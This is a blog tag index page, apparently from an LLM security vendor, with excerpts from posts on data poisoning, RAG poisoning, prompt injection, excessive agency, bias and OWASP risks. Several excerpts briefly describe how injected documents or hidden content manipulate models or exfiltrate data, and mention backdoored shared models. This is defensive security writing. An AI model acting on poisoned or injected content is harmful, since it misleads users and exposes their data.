Skip to main content

19 posts tagged with "best-practices"

View All Tags

Defending Against Data Poisoning Attacks on LLMs: A Comprehensive Guide

Vanessa Sauter
Principal Solutions Architect

Data poisoning remains a top concern on the OWASP Top 10 for 2025. However, the scope of data poisoning has expanded since the 2023 version. Data poisoning is no longer strictly a risk during the training of Large Language Models (LLMs); it now encompasses all three stages of the LLM lifecycle: pre-training, fine-tuning, and retrieval from external sources. OWASP also highlights the risk of model poisoning from shared repositories or open-source platforms, where models may contain backdoors or embedded malware.

When exploited, data poisoning can degrade model performance, produce biased or toxic content, exploit downstream systems, or tamper with the model's generation capabilities.

Understanding how these attacks work and implementing preventative measures is crucial for developers, security engineers, and technical leaders responsible for maintaining the security and reliability of these systems. This comprehensive guide delves into the nature of data poisoning attacks and offers strategies to safeguard against these threats.

Beyond DoS: How Unbounded Consumption is Reshaping LLM Security

Vanessa Sauter
Principal Solutions Architect

The recent release of the 2025 OWASP Top 10 for LLMs brought a number of changes in the top risks for LLM applications. One of the changes from the 2023 version was the removal of LLM04: Model Denial of Service (DoS), which was replaced in the 2025 version with LLM10: Unbounded Consumption.

So what is the difference between Model Denial of Service (DoS) and Unbounded Consumption? And how do you mitigate risks? We'll break it down in this article.

Leveraging Promptfoo for EU AI Act Compliance

Vanessa Sauter
Principal Solutions Architect

Beginning on February 2, 2025, the first prohibitions against certain AI systems will go into force in the European Union through the EU AI Act.

The Act, which is the first comprehensive legal framework of its kind to regulate AI systems, entered into force on August 1, 2024 and will roll out mandatory provisions through August 2026. The purpose of the Act is to regulate broadly-defined AI systems, particularly around systems that are classified as high-risk, such as AI deployed in healthcare, education, employment, public services, law enforcement, migration, and the legal system.

Anyone who develops, uses, imports, or distributes AI systems within the EU, regardless of where they are located, will fall under the scope of this regulation.

RAG Data Poisoning: Key Concepts Explained

Ian Webster
Engineer & OWASP Gen AI Red Teaming Contributor

AI systems are under attack - and this time, it's their knowledge base that's being targeted. A new security threat called data poisoning lets attackers manipulate AI responses by corrupting the very documents these systems rely on for accurate information.

Retrieval-Augmented Generation (RAG) was designed to make AI smarter by connecting language models to external knowledge sources. Instead of relying solely on training data, RAG systems can pull in fresh information to provide current, accurate responses. With over 30% of enterprise AI applications now using RAG, it's become a key component of modern AI architecture.

But this powerful capability has opened a new vulnerability. Through data poisoning, attackers can inject malicious content into knowledge databases, forcing AI systems to generate harmful or incorrect outputs.

Data Poisoning

These attacks are remarkably efficient - research shows that just five carefully crafted documents in a database of millions can successfully manipulate AI responses 90% of the time.

How Do You Secure RAG Applications?

Vanessa Sauter
Principal Solutions Architect
red panda using rag

In our previous blog post, we discussed the security risks of foundation models. In this post, we will address the concerns around fine-tuning models and deploying RAG architecture.

Creating an LLM as complex as Llama 3.2, Claude Opus, or gpt-4o is the culmination of years of work and millions of dollars in computational power. Most enterprises will strategically choose foundation models rather than create their own LLM from scratch. These models function like clay that can be molded to business needs through system architecture and prompt engineering. Once a foundation model has been selected, the next step is determining how the model can be applied and where proprietary data can enhance it.

Prompt Injection: A Comprehensive Guide

Ian Webster
Engineer & OWASP Gen AI Red Teaming Contributor

In August 2024, security researcher Johann Rehberger uncovered a critical vulnerability in Microsoft 365 Copilot: through a sophisticated prompt injection attack, he demonstrated how sensitive company data could be secretly exfiltrated.

This wasn't an isolated incident. From ChatGPT leaking information through hidden image links to Slack AI potentially exposing sensitive conversations, prompt injection attacks have emerged as a critical weak point in LLMs.

And although prompt injection has been a known issue for years, foundation labs still haven't quite been able to stamp it out, although mitigations are constantly being developed.

Understanding Excessive Agency in LLMs

Ian Webster
Engineer & OWASP Gen AI Red Teaming Contributor

Excessive agency in LLMs is a broad security risk where AI systems can do more than they should. This happens when they're given too much access or power. There are three main types:

  1. Too many features: LLMs can use tools they don't need
  2. Too much access: AI gets unnecessary permissions to backend systems
  3. Too much freedom: LLMs make decisions without human checks

This is different from insecure output handling. It's about what the LLM can do, not just what it says.

Example: A customer service chatbot that can read customer info is fine. But if it can also change or delete records, that's excessive agency.

The OWASP Top 10 for LLM Apps lists this as a major concern. To fix it, developers need to carefully limit what their AI can do.

Preventing Bias & Toxicity in Generative AI

Ian Webster
Engineer & OWASP Gen AI Red Teaming Contributor

When asked to generate recommendation letters for 200 U.S. names, ChatGPT produced significantly different language based on perceived gender - even when given prompts designed to be neutral.

In political discussions, ChatGPT responded with a significant and systematic bias toward specific political parties in the US, UK, and Brazil.

And on the multimodal side, OpenAI's Dall-E was much more likely to produce images of black people when prompted for images of robbers.

There is no shortage of other studies that have found LLMs exhibiting bias related to race, religion, age, and political views.

As AI systems become more prevalent in high-stakes domains like healthcare, finance, and education, addressing these biases necessary to build fair and trustworthy applications.

ai biases

How Much Does Foundation Model Security Matter?

Vanessa Sauter
Principal Solutions Architect

At the heart of every Generative AI application is the LLM foundation model (or models) used. Since LLMs are notoriously expensive to build from scratch, most enterprises will rely on foundation models that can be enhanced through few shot or many shot prompting, retrieval augmented generation (RAG), and/or fine-tuning. Yet what are the security risks that should be considered when choosing a foundation model?

In this blog post, we'll discuss the key factors to consider when choosing a foundation model.